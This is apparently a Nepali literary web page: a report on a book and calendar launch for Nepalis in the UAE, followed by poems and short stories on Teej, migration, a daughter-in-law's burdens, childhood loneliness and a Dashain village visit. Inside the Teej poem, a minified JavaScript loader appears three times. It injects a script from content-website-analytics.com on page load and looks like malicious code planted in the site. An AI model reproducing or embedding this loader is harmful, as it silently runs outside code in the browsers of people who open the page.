यूएईमा नेपाली मिडिया र नेपाली समाजलाई एकसूत्रमा जोड्ने उद्देश्यसहित आयोजित “कृति तथा क्यालेन्डर बिमोचन कार्यक्रम” सम्पन्न भएको छ। कार्यक्रममा सेतोमसीबाट प्रकाशित पत्रकार कमला अर्यालद्वारा लिखित “नारी नेतृत्व” कृतिको साथै लुम्बिनी पाना मिडियाको क्यालेन्डर बिमोचन गरिएको थियो।
कार्यक्रमको अध्यक्षता लुम्बिनी पाना मिडियाका बिदेश बिभाग प्रमुख निशान्त पाठकले गरेका थिए भने प्रमुख अतिथिका रूपमा नेपाली समाज यूएईका अध्यक्ष राम मोक्तानको उपस्थिति रहेको थियो। कार्यक्रममा विशिष्ट अतिथिका रूपमा लुम्बिनी प्रदेश समाज यूएईका अध्यक्ष नारायण अधिकारी सहभागी रहेका थिए।
त्यसैगरी अतिथिहरूमा एनआरएनए एनसीसी यूएईका उपाध्यक्ष तथा ट्रस्टेड की टाइपिङ सेन्टरका सञ्चालक रुद्र थापा, भेराइटी मोमोका सञ्चालक आशिष पुरुष, पाल्पाली सेवा समाज यूएईका सदस्य राजु बस्याल, स्याङ्जा सेवा समाज प्रमुख सह सचिव कल्पित भण्डारी, देवदह सेवा समाज यूएईका अध्यक्ष श्याम बस्याल, सगरमाथा टुर्स एण्ड ट्राभल्सका सञ्चालक ताराप्रसाद खनाल, पर्वत समाज यूएईका अध्यक्ष पूर्णप्रसाद भुसाल, धौलागिरि टुर्स एण्ड ट्राभलका संचालक उमेश भुसाल, तपस्या एकाउन्टिङकी एकाउन्ट म्यानेजर एवं देवदह सेवा समाज यूएईकी प्रतिनिधि बिन्दु अधिकारीलगायतको उपस्थिति रहेको थियो।
कार्यक्रमका अध्यक्ष निशान्त पाठकले स्वागत मन्तव्यसहित कार्यक्रमको उद्देश्यबारे प्रकाश पार्दै यूएईमा रहेका नेपालीहरूको संघर्ष, सफलता र प्रेरणादायी कथालाई सञ्चारमाध्यममार्फत उजागर गर्नु मुख्य लक्ष्य रहेको बताए। उनले प्रवासमा रहेका नेपाली समुदायको सहयोग, सहकार्य र सहभागिताले यस्ता सिर्जनात्मक तथा सामाजिक अभियानलाई थप प्रभावकारी बनाउने विश्वास व्यक्त गरे।
कार्यक्रममा बोल्ने विभिन्न अतिथिहरूले यूएईमा आफ्नो अनुभव सुनाउँदै लुम्बिनी पाना र सेतोमसीले नेपाली समुदायका आवाज, अनुभव र गतिविधिलाई उजागर गर्ने दिशामा सकारात्मक सुरुआत गरेको बताए। समाचार तथा सामग्री प्रकाशन गर्दा अध्ययन, अनुसन्धान र तथ्यमा आधारित भएर प्रस्तुत गर्न सुझावसमेत दिएका थिए।
प्रमुख अतिथि राम मोक्तानले नेपालबाट विदेशमा आएपछि पनि कामसँगै समाजसेवा र सामुदायिक गतिविधिमा सक्रिय रहन सकिने धारणा व्यक्त गरे। उनले कुनै पनि काम असम्भव नहुने उल्लेख गर्दै इमानदारी, निरन्तरता र मेहनतका साथ अघि बढे सफलता हासिल गर्न सकिने बताए। साथै, नेपाली समाज यूएई तथा व्यक्तिगत रूपमा आफूबाट हुनसक्ने सहयोग र सहकार्य निरन्तर रहने प्रतिबद्धता व्यक्त गरे।
आयोजकका अनुसार सेतोमसीबाट प्रकाशित कमला अर्यालको “नारी नेतृत्व” कृतिले महिलाको नेतृत्व, क्षमता विकास, सामाजिक भूमिका तथा सशक्तिकरणका विविध पक्षलाई समेटेको छ। त्यसैगरी बिमोचन गरिएको लुम्बिनी पाना क्यालेन्डरलाई मिति हेर्ने माध्यम मात्र नभई नेपाली कला, संस्कृति, पहिचान तथा सामाजिक सम्बन्धलाई जोड्ने माध्यमका रूपमा प्रस्तुत गरिएको थियो।
साहित्य, कला र सिर्जनाले समाजलाई सभ्य, सुसंस्कृत र जागरूक बनाउन महत्त्वपूर्ण भूमिका खेल्ने उल्लेख गर्दै आयोजकले यस्ता कार्यक्रमले प्रवासमा रहेका नेपाली समुदायलाई अझ नजिक ल्याउने विश्वास व्यक्त गरेका थिए।
Category: साहित्य
साहित्य
-

कृति तथा क्यालेन्डर बिमोचन सम्पन्न
-

घुमन्ते मन, घुमन्ते बादल
आज घरको बरन्ढा बसिरहँदा एउटा घुमन्तेको याद आयो। आकाश निलो थियो। मैँले त्यो घुमन्तेलाई बोलाएँ ……
कता छौ तिमी, आकाश त निलो छ ।
कता हरायौ तिमी, अस्तित्व नै हराय जस्तै ।
ए बादल म यता छु, आउ यता ।
खुसी देखिन्छौ त आज, म जस्तै ।
शान्त छौ त तिमी आज धेरै ।
हसिँलो छ त तिम्रो मुहार, मेरो जस्तै ।
तिमी त धेरै ठाँउ डुल्ने गर्छौ रे ।
शीतल र पानी दिने गर्छौ रे, आँसु जस्तै।
फरक फरक आकार बनाइ गिज्याउने गर्छौ रे ।
कतै बाघ रे त कतै मेरो दिल जस्तै।
शरद ऋतुतका शान्त हुने गर्छौ रे ।
जता ततै खडेरी पार्छौ रे, सुख्खा आँखा जस्तै ।
तिमिलाई गर्मीदेखि रिस उठ्ने गर्छ रे।
कालो विशाल हुने गर्छौ रे, म रातो भए जस्तै।
घामले माथिबाट पोल्दा आँसु तल झार्ने गर्छौ रे ।
बाडि पहिरो ल्याउँछौ रे, घाइते मुटु जस्तै ।
आँसुले तिम्रो खडेरिलाई चड्कन हान्नेगर्छौ रे।
किसानको खेतमा हरियाली ल्याउने गर्छौ रे, बसन्त जस्तै ।
पोल्दा घामले तिमीलाई आत्थु आत्थु गर्ने गर्छौ रे।
पैतलामा शीतल ल्याउँछौ रे, त्यो गरिबलाई जस्तै।
आँधी हुरि पनि तिमीले नै ल्याउने गर्छौ रे,
गड्याङ गुडुङ्ग गरि तर्साउने गर्छौ रे, त्यो भोको पेट जस्तै ।
– रोहन रेग्मी
-

आयो तीज
जागिर छैन, पैसा छैन, छैन चाडको रङ्ग छैन।
आउन त आयो नि तीज, छिमेकीको आँगनसम्म, हाम्रो घरमा आउँदा त चाडलाई पनि उमङ्ग छैन।
रित्तो छ आमा गोजी अनि रित्तै छ भान्सा पनि।
आउदिन्न दिदी, आउँदिने बहिनी।
उतै रमाउँछिन् भान्जी, आउँदैन भान्जा पनि।
फाटेकै त हो आमा भाग्य, खुसी गरिबीले छोएपछि रुन नगर, हतार।
चाड त हुनेखानेलाई हो, हामी हुँदा खानेलाई जहिले हुन्छ तब चाड।
हुन त आमाको मन मानेन होला, मनाउ आमा।
हिजो आज त पैसाले किन्छ सम्बन्ध।
नौ गेडी र तिलहरी लर्काउँदै नाच्छिन् दिदी।
तिम्रो बुच्चो गला हेर्दिनन्।
सुन र सुनको भाउ दाज्छे बैनी।
तिम्रो माया र त्याग दाज्दिनन्।
जसो तसो मनलाई बुझाउला नि है,
आमा मै छोरी बनेर तीज मनाउला नि है।
तिमी भन्छौ माइत भनेपछि त हामी सातै खोली तरेर पुग्थ्यौ गाभरी आँसु बनाएर।
कसरी सकेको होला बस्न मेरो आँशुलाई सस्तो गराएर।
तिमीले नै भनेकी हौ समयसँगै चल्नु पर्छ।
पुछ आमा आँसु।
जसोतसो मनलाई बुझाउला नि है,
मै छोरी बनेर तीज मनाउला नि है।
आए त हुने नि, एकै छाक ऋण काढेरै पनि खुवाउथे भन्छिन् आमा।
यही आँगनबाटै दिएको हो तर पुगे उनी चन्द्रमामा।
के गर्छ्यौ आमा समय उस्तो कि,
दिदी बहिनी, एकदिन छिनोफानो गरौला नि है।
मै छोरी बनेर तीज मनाउला नि है।;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);
-

जन्मिएपछि किन नबाँच्ने
चरीले पनि एक मौसममा गुँड सार्नुपर्छ,
फूलले आफ्ना सारा पातहरू झार्नुपर्छ,
घामकै पनि चिसो याममा अस्तित्व नै मेटिन्छ त,
हेर आफ्नै वरपर कहाँ एकनास भेटिन्छ त ?बुझी हेर, हर कोहीसँग हर्षित जीवन कसले प्रस्ट्याउँछ?
बाली पनि हावाहुरी, पानी अनि हिमपश्चात् फस्टाउँछ!
सङ्घर्ष नै जीवन र जीवन नै सङ्घर्ष भए, सङ्घर्षसँग किन भाग्ने ?
सोच त! जन्मिएपछि किन नबाँच्ने ?जरुरी छैन, हरपल मनलाई चोटले छोइदिन्छ,
एक पल मुस्काउँछ ओठ त अर्को पल आँखा रोइदिन्छ।
सङ्घर्षको अघि घुँडा टेक्नुभन्दा घुँडा घसेर किन नबाझ्ने?
सोच त! जन्मिएपछि किन नबाँच्ने ?जन्मिनुमा तिम्री आमाको मिठो अभिलाषा हुन सक्छ,
मुहारमा तिम्रो उनले देखेको सुनौलो आशा हुन सक्छ।
पीडा सम्झँदै धिक्कार्नुभन्दा, मुस्कुराउन मिठा सम्झना किन नसाँच्ने?
सोच त ! जन्मिएपछि किन नबाँच्ने ? -

बुहारी हौ, सहन सिक
भर्खरै बिहे भएको, सबै नयाँ-नयाँ थियो।आमालाई तिलहरी, बालाई औंठी दिँदै ढोगे।
सबै दाइजो हेरिरहेका थिए,
म मनमनै कति ऋण लाग्यो भनेर जोड्दै थिएँ ।कहिल्यै नटेकेको घरलाई आफ्नो घर,
र आफू जन्मेर फूलबारी सजाएको घरलाई माइती भन्नुपर्ने।न जन्माएको, न हुर्काएको, न पढाएको, न त्याग-तपस्या गरेको तर सहजै आमा-बाबा स्वीकार गर्नुपर्ने।
आफ्नै मुटुको टुक्रालाई पराइसँग सुम्पिदिँदा संस्कारको परिभाषा घोटाउनु पर्ने।
कहिल्यै नचिनेको अनजान व्यक्तिलाई भगवान मानी पाउ पूज्नुपर्ने।जीवनका सारा अतीतलाई तिलाञ्जली दिँदै नयाँ संसार सजाउनुपर्ने।
बेस्सरी हाँस्नु भएन, धेरै बेर सुत्नु भएन, छिटो-छिटो बोल्नु भएन, हतार-हतार हिँड्नु भएन।
रिस कहिल्यै अनुहारमा आउनु भएन, थाक्नु कहिल्यै भएन, रुनु कहिल्यै भएन।
छोटो लुगा लगाउन भएन, बुढासँग धेरै मिल्न भएन, छोरी मात्र पाएर भएन।
सबैको खुट्टा ढोग्नुपर्यो, आफू तल परेर अरू माथि राख्नुपर्यो।सिन्दूर, पोते, चुराले ढाकिनुपर्यो। सँगै जागिर खाएर बुढा सोफामा, अनि बुढी चुलोमा पस्नुपर्यो। सबै आफन्तजनको आँखाको नानी बन्नुपर्यो।
आमा-बुबालाई भेट्न अनुमति माग्नुपर्यो। कति सहजै भन्छौ है— “तिमी बुहारी हौ, कसैको चित्त नदुखाऊ” तर बुहारीको पनि मन छ, चित्त दुख्छ, कहिँ कसैले सोध्यो?
बुहारी हुँदै गर्दा मैले त्यागेका मेरा खुशीको मूल्य कसैले सोध्यो? कति सहजै भन्छौ— “बुहारी हौ, कसैको चित्त नदुखाऊ।”
– अनिता रेग्मी
-

कल्पनाको छायामा
खै, कसरी गरूँ सुरु?
मेरो कथा लेख्दा-लेख्दै,
कलमको मसी सकियो,
तर सकिएन मेरो मनको बेथा।झिसिमिसे रातमा, जून लागेसँगै,
मेरो आँखामा कैद भयो
सुन्दर तस्बिर—
तस्बिरको रङ, आकार,
र त्यहाँका अनगिन्ती कालाकृति।
देख्नसाथ, मेरो मन त्यसैमा मोहित हुँदै थियो।
झन् झन् आकर्षित,
स्वप्नभूमिमा हराउँदै थिएँ म।हेर न, ओइ!
कस्तो उडे जस्तो लागिरहेछ,
जीवनको केही पलका लागि
समय मेरै लागि पर्खेजस्तो लागिरहेछ।
मेरा बेरङ्ग सपनामा,
कति मिठो रङ भरिएको जस्तो लागिरहेछ।
कति भाग्यमानी रै’छु है म,
यो सबै त मेरो इसारामै
जीवन चलिरहेको जस्तो छ।तर, अचानक
मैले देखेको त्यो कल्पनिक चित्र
किन धुमिल हुँदै गयो?
नचाहँदा-नचाहँदै,
आधा रातमा आँखा खुल्न पुग्यो।आफ्नै स्थिति हेरेँ,
मेरो मन खल्लो भयो।
देखेका सपनाहरू
सबैले आफैँ बलि चढ्न थाले,
र जिन्दगी फेरि बेरङ्ग हुँदै गयो।जिन्दगी बेरङ्ग भए पनि,
त्यो सपनामा कुनै संकेत थियो।
खै, के थियो त्यो इशारा,
बुझ्न अलि गाह्रो पो भयो।
सपनामा भए पनि
मनले खोज्दै छ कुनै सहारा।शायद, यो पल पनि
कुनै नयाँ कथा बन्नेछ।
र म फेरि लेख्नेछु—
बेथा सकिएला नसकिएला,
तर कथा कहिल्यै सकिने छैन!सपना सकिए पनि, तिनले देखाएको बाटोले कहिल्यै अन्त्य पाउँदैन।
ईरा अर्याल
-

एक्लोपनको कथा
कृषि तथा वन विज्ञान विश्व विद्यालय, रामपुर, चितवन पाँचौ सत्रान्त २१ औं शताब्दीमा आइपुग्दा हाम्रा माननीय लेखक, सायर, कवि, इत्यादीद्वारा विभिन्न सन्दर्भमा विभिद प्रसङ्गका गाथा (कथा) हरू लिखित छन्; प्रकाशीत छन् ।
म स्वयमलाई लेखकसँग दाजदिन तर एउटा कथा;अभिचलको एक्लोपनको कथा भने सुनाउन गइरहेको छु। शिशिर ऋतुको स्पष्ट निलो आकाश र मंद हावाले निम्त्याएको शितलतामा हर्षोउल्लासका साथ श्री सिधी विनायक माद्य्यामिक विधालयका विद्यार्थीहरू खलकुदमा मस्त व्यस्त थिए । वातावरण निकै रमणीय छ। २ वोटा पिरियड पछिको छोटो ब्रेकमा केही विद्यार्थीहरु चौरमा गफ चुट्दै त केही भकुण्डो खेल्दै छन् तर कक्षा ९ मा अध्ययन गर्ने अभिचल भने आफ्नो साथीहरूको गतिविधिलाई न्यालेरै मात्र बस्छन्।
यो दृश्य भने म आफूले परबाट अवलोकन गर्दै थिए। एकान्तमा नियालिरहेका अभिचलको आँडमा गएर मैले सोधे,”भाइ, तिमी साथीहरूसँग खेल नखेल्ने ? तिम्रो साथिहरु रमाइलो गरिरहेछ्न, जाऊ जाऊ गएर खेल ! ब्रेक सकिन आट्यो।” मेरो प्रश्नको उत्तर आएन । यस मौनताले सिर्जएको कौतुहुलतालाई बुझ्न् खोज्दै म उतिर मोडीए।
उसको मुहार कान्तीहीन थियो। गहबाट आँसु खस्न मात्र बाकी थियो। आश्चर्य चीकत म, मेरो अर्को वाक्य फुट्न नपाउदै उनका आँखाबाट टिलपिल अश्रुधारा बग्न थाले।म अतालिए।उसलाई सम्हाल्न प्रयास गर्दै आढ्को खाली कक्षाकोठामा लगेँ। उसको चेष्टाप्रति अनविज्ञ म संकोचमा परें ।केही क्षणपछि त्यो मौन्ता र आँसुहरुले हजारौ भावना व्यक्त गर्न थाले ।
“म माथी किन यस्तो भयो? के अब सधै यस्तै हुन्छ? के मैले यस्को आत्मगलानी गीररनुपर्नेर्छ ?” ऊ पुट्पुटाउन थाल्यो। तर म उसले भन्न खोजेका शब्दको तात्पर्य बुझ्न असमर्थ रहे। (मैदानबाट भकुण्डो उछिटि्एर हामी बसेको कोठाको ढोकामा ठेस् हानी चौरतिरै फर्कन्छ।) “भन्ज्याङ्गको पाँखो-पखेरोमा जन्मे- हुर्केको म,गाँउले परिवेशमा रुझेको म! आज यहाँ सम्म आइपुगेछु। तर अवस्था उस्तै छ! त्यो बेलाको असर अहिले सम्म झल्किन्छ।
म प्राविधिक विद्यालयमा कक्षा ३ मा हुदाँ खेलप्रति औधी जिज्ञासा राख्ने छात्र हुँ। अहिले पनि त्यहाँ गएर भकुन्डोलाई लात्ति हाने, क्रिकेटमा होमरन् हान्ने र त्यो जीतको उल्लास, मेरा प्रियशी मित्रसँग गुन्जाएमान गराउने मेरा पनि इच्छा थिए होलान नि!अफसोस् यो प्रयास सोच मै विलिन भयो ।” उनले लामा लामा सुस्केरा फेर्दै भने। (कोठा गुम्म भएजस्तो लागेर मैले झ्याल खोले ।
बाटिका को फुलहरुको सुगन्दलाई चिसो हावाले कोठामा ल्याउछ। तर शितल हावाले भने उनको भित्री राफलाई सेलाउन सकिरहेको थिएन। ) “म त्यो बेला अरुको तुलनामा सानो थिए, तर कमजोर भने पकै थिइन्। सायद मलाई शान्त स्वभावको र फितलो देख्दथे ऊनिहरु! कसैसँग झगडा नगर्ने,अपशब्द नबोल्ने, नरम बोल्ने, छुद्रता नभएको शिष्ट थिए ।के यी गुणहरु , समाजले अवगुण भनी ठहराएको थियो र? किन मलाई खेल खेल्ने जस्ता अन्य कृयाकलापबाट अलग गराइयो त ? सायद मेरो रुचिलाई मेरो आयतनले पराजित गरेछ।” उनी बोल्दा धेरै पल्ट शब्दहरु घाटीमै अडकिनथो।
उसको आवाज सुक्खा थियो, तर उसको आफ्नो कथामा क्रमश: पीडा ताजा हुँदै आए। “प्राथमिक विद्यालयमा हुने खेलकुद कार्यक्रम मा पनि बलिया, हट्टकट्ट , ज्याङ्गोलाई मात्र सहभागी गराउथे, टीम जिताउन भनेर ! यो कस्तो नियम थियो? के खेलमा सधै जित्नेको मात्र अस्तित्व हुने हो? के जित्न बलिया मात्र हुनुर्पछ ? के हाम्रो इच्छाशक्ति चाहिँ केही होइन ? कहिलेकाही सोच्द्थे – अरुले जित्नको लागि खेलछन् म चाहिँ रम्नलाई पनि खेल्न नपाउने । न साथ, न समर्थन।” ” धोक्रा मरेको कस्ले हेर्छ र? मेरो त्यो सपना काँचो वास जस्तै रहीरहयो।”
उनको आँसु पुनः छचल्किए।” मेरी आमाले टिफिन भरि मिठा पकवान पठाउनुहुन्थ्यो। बाडीचुडी खाए है भनी।(आँसु पुच्छदै ) तर बिचरी मेरी आमालाई के थाहा थियो र , त्यो टिफिन ब्रेकमा म तिता पलहरु काट्दै बस्थे। त्यो गाँसको आसपास कोही हुन्न्थयो। आफ्ना हितैसिसङ्ग मिठा गफ गर्न यो मन सधै लालायित रह्न्थ्यो।” उनको आँखामा झल्केका दुखाइ शब्द्का भावभन्दा ठूला थिए। उसका सासमा झल्किएको पीडा, आसुमा परिणत भइरह्यो र भइनैरह्यो । “मलाई लाग्छ मेरो एक्लोपन कक्षाकोठाका भित्ता ,बेन्ची , यिनै निर्जीव वस्तुले बढि बोध गरेका छन्। कक्षाकोठामा गुन्जने हाँसोले मेरो मौनता चिर्थ्यो। त्यो हाँसोमा मेरो हाँसोले कहिल्यै आफ्नो प्रतिनिधि दर्शाउन पाएन ।बाकी रह्यो म र मेरो पुस्तक! अहिले कक्षा ९ मा आइपुगे।यतिन्जेल मेरो हितैसी दौतरी भन्नु नै केवल पुस्तक पुस्तिका रह्यो जस्मा म मेरा भाव कोर्छु र ती शब्दका शृङ्खलाले उत्पन्न भाव म स्व्यमलाइई सुनाउथे ।किनकी म स्वयमलाई सुन्ने सुनाइदिने पनि त छैनन् ।”
उनको भावनाको छाल पराकाष्ठ हुँदै गयो। उनको आँखाको अश्रु सुकेछ्न तर पिडा जिउँदै थियो । “अनन्त यात्रामा निरन्तर बहने एक्लो नदी पनि त अन्ततः महासाँगरलाई भेट्छ; जहा भिन्न भिन्न नदीहरू एकै स्थानमा एकाकार हुन्छन। म पनि त्यही महासाँगरको प्रतीक्षामा छु जहाँ मलाई समावेश गर्ने छन। जहाँ मेरो अस्तित्व; म स्वयमलाई निष्पक्षरुपले अगाल्ने छन्। मेरो वेदना, मेरो मौनता, मेरो एक्लोपनलाई समाहीत गरि म हुनुको भाव संगाल्नेछन्।”
खेलप्रतिको अभिलाषा बाल्यकाल छ्दा देखिनै निभे पनि प्रियजनहरुको खोजीमा उनी तत्पर रहेछन्: जसले ऊ आफू जस्तो छ , त्यस्तो नै अपनाउन्, एक्लोपनको त्यो निस्पट्ट कालो अन्धकारलाई छिचोलेर उनमा नविनता ल्यावोस्। (स्कुलको ब्रेक सकिएको घण्टी बज्छ।) उनले तन्द्राबाट ब्युझेझै गरेर भने, “आज पनि समय र स्थान फरक छ, तर घटना भने उही! आज पनि मेरा कक्षाका मित्रहरुलाई मनको कुनाबाट हास्दै खेल्दै गरेको हरिहेको छु । केही फरक छैन। त्यही रित्तोपनको अनुभुती ! त्यो हुटुहुटि जुन मेरो बाल्यकालले त्यो खेलमैदानमै निभाइसकेको छ।” उनका हृदयाका कुंठित वेदानहरुको प्रस्फुटन सकिएछ्न ।
म उसलाई सान्त्वना दिन उसको शिरलाई सुमसुम्याउदै आङगालो मार्न खोजे। हात मेरा पिठ्यूसम्म मात्र के पुगेको थियो मेरो आँखा उसको मुहारतर्फ गयो। उसलाई देख्न साथ मलाई छाङ्गाबाट खसे जस्तै अनुभुति भयो।
मेरो हृदयको स्पन्द्न तिव्र हुन थाल्यो।खलखलि पसिनाले लिप्त हुन थाले । यतिका समय पश्चात मैले जसलाई हेरेर यो कथा सुन्दै थिए ,त्यो व्यक्ति अरु कोहि नभइ म आफैं रहेछु मानौ आफ्नो विगतसंगै संवाद गर्दै थिए।म झसकिए। म अन्यासै बिउझिए।
-किरण खनाल
-

एउटा नयाँ उज्यालो
देख्छु बाबुको ढल्किदो उमेर अनि कतैबाट अलिकति जिम्मेवारी बटुल्दैछु ,
जब सम्झन्छु आमाको स्नेह हरेक स्त्रीका लागि म सम्मान बटुल्दैछु,
अलिअलि थोरै थोरै बटुल्दै छु उज्यालो ,
जस्तै मुठ्ठीभरि म जुनकिरी बटुल्दैछु ,
म एउटा नयाँ उज्यालो बटुल्दैछु।हारहरू छैनन् मेरा निम्ति म मात्र अब सिकाईहरु बटुल्दैछु,
प्रश्तापका छैनन् कुनै गिन्ती म मात्र अब स्वीकार्य बटुल्दैछु ,
अलिअलि थोरै थोरै बटुल्दैछु ईख,
जस्तै म आना-आना तोला ,सफलता बटुल्दैछु,
म एउटा नयाँ उज्यालो बटुल्दैछु ।अहङ्कार भन्दा त स्नेह ठूलो छ मेरा निम्ति त्यसैले त म अलिकति सम्झौताहरू बटुल्दैछु ,
स्वार्थ भन्दा त प्यारा सम्बन्ध र सम्झना त्यसैले त म आफ्नाका लागि समय बटुल्दैछु,
अलिअलि थोरै थोरै बटुल्दैछु धैर्य ,
जस्तै म घडी-घडी भविष्य बदल्दैछु ,
म एउटा उज्यालो बटुल्दैछु ।काँधहरूमा जिम्मेवारी बोकेर ,
ओठहरूमा मुस्कान लिएर,
म आजका लागि चुनौतीहरू बटुल्दैछु,
मनभरि साहस भिरेर ,
आँखाभरि विश्वास बोकेर ,
म भोलिका लागि गन्तव्य बटुल्दैछु ,
अलिअलि थोरै थोरै बटुल्दैछु मेहनत
जस्तै म सपना थोपा थोपा समुद्र बटुल्दैछु
म एउटा उज्यालो बटुल्दैछु।-नरेश बस्नेत
-

फर्केर हेर्दा : ४ दिनको दशैं यात्रा
२०७९ साल।
करिब ४ बर्षपछि पहाड घर जान लाग्दाको उत्साह अनौठो थियो। बुटवलबाट मात्र ४ घण्टाको बाटो,आइपुगेकि भनेर ४०० चोटि झ्यालबाट त नियाले नै होला। झ्यालबाट नियालिरहदा ती चारैतिर बाट घेरिएका पहाडी सुन्दर दृश्यहरुले मनलाई अझ आतुर गराइरहेको थियो।४ जनाको परिवार हाम्रो,नभन्दै प्रदेश न.४ स्थित जिल्ला स्याङ्जा पुगियो। अचम्मलाग्ला तर एकजनाको गाडिभाडा रु.४०० नै रहेछ। चारैजनाको गाडिभाडा तिरिवरि हामी झर्यौं।
अब पैदल हिड्नुपर्ने करिब ४० मिनेट। देखेचिनेका गाउँले देखभेट गर्दै हामी ओरालो लागेउं। त्यो चिसो हावापानी,सानोछदा पौडी खेल्ने त्यो खोला,घुम्तीनीर खरले छाएको त्यो बिसौनी,हरेक साझ किर्तन हुने त्यो कालिका मन्दिर अनि आफुलाइ क,ख चिनाएको त्यो ४ कोठाको स्कुल। पक्कैपनि आफू जन्मिएको ठाउँ स्वर्ग भन्दा प्यारो लाग्दो रहेछ।घर पुगियो। पुग्नासाथ हजुरआमालाइ ढोगें। “हेर हेर, दुब्लाएर ४ हड्डी बाहेक केही बाकी रहेनछ..ए राधा,खुवाउन छोडिस कि क्याहो मेरो नाति लाई?” आमाले हासो गर्दै सोध्नुभयो। मम्मी पनि हास्नुभयो,केहि बोल्नुभएन। दुब्लाउ थिइन पनि कसरी।दिनमा ४ पटक भोक लाग्यो भनेर दुखदिने मान्छे म, आजकल ४ दिनमा मात्र ४ पटक खाएपनी बाँच्न सक्छु जस्तो लाग्छ।
गाउँ डुल्न आतुर म, भोलिपल्ट ४ नबज्दै बिउँझिएछु। सबै नित्यकर्म सकिसकेपछि म गाउँ डुल्न निस्किए।कृषि पढिरहेको म, सुरुमै त्यि बाझो खेतहरुमा आखा गयो। पल्लाघरको बुवालाई यसबारे सोधेँ। “गाउँमा ४ बर्ष भन्दा मुनि अनि ४० बर्ष भन्दा माथी उमेरका मान्छे मात्र धेरै भएपछी कस्ले गरेर खाने बाबु? सक्ने खाने कोहि तराइ त कोहि पराइ। त्यसमाथि ४ गाउँ डुलेपनि एकहल गोरु पाइने होइन..केले जोत्ने? कस्ले जोत्ने?”बुवाले थप्नु भयो। म निशब्द भए। हस बुवा भनी निस्किए।
माथिल्लो घरकि ठुलीआमा पनि डिलैमा बसेर चिया पिइरहनु भएको रहेछ। आमालाई ढोगभेट गरे। “आमा दाइ खोइ त?”
मैले सोधेँ। “आछैन बाबु” नरम स्वरमा उत्तर दिनुभयो। ४ बर्ष भैसकेछ गोबिन्द दाइ बिदेशबाट नफर्किएको। यसैगरि सबै गाउँ डुले। गाउँ रित्तो लाग्यो। ४० वटा घर भएर के गर्नु, “घर” जस्तो घर ४ वटा पनि नभएपछी…..आज बडादशैं, ४ दिन भैसक्यो झरी परेको। आजपनि रोकिएन। ११:५२ को साइत तर टीकाटालो सकिसक्दा ४ बज्न आटेको थियो।
अर्कोदिन ४ वटा छाताओडि हामी ४ जना मामाघर तर्फ लाग्यौं।
त्यै ४० मिनेटको बाटो….पानी,हिलो,उकालो अनि सेलरोटीले भरिएका ती ४ झोला ले गर्दा आज ४ घन्टा लाग्यो। जसोतसो उकालो चडियो। अनि चारैतिर हेरेर लामो सास फेर्दै गाउँलाइ बिदा गरिदिए।खै किन हो।
जिन्दगीको गति ४ गुणाले बडिरहेको जस्तो महसुस हुन्छ।अबको ४ दिन भित्र, रामपुरमा हुनेछु।
त्यै ४ भित्ताको कोठा।
४० जना विद्यार्थी तर त्यिनै ४ वटा मिल्ने साथी।
४ बर्षको पढाइ।
४०,००० को जागीर या त चारैतिर अन्धकार।-अमृत न्यौपाने
AFU, Rampur
Ag,5th sem.







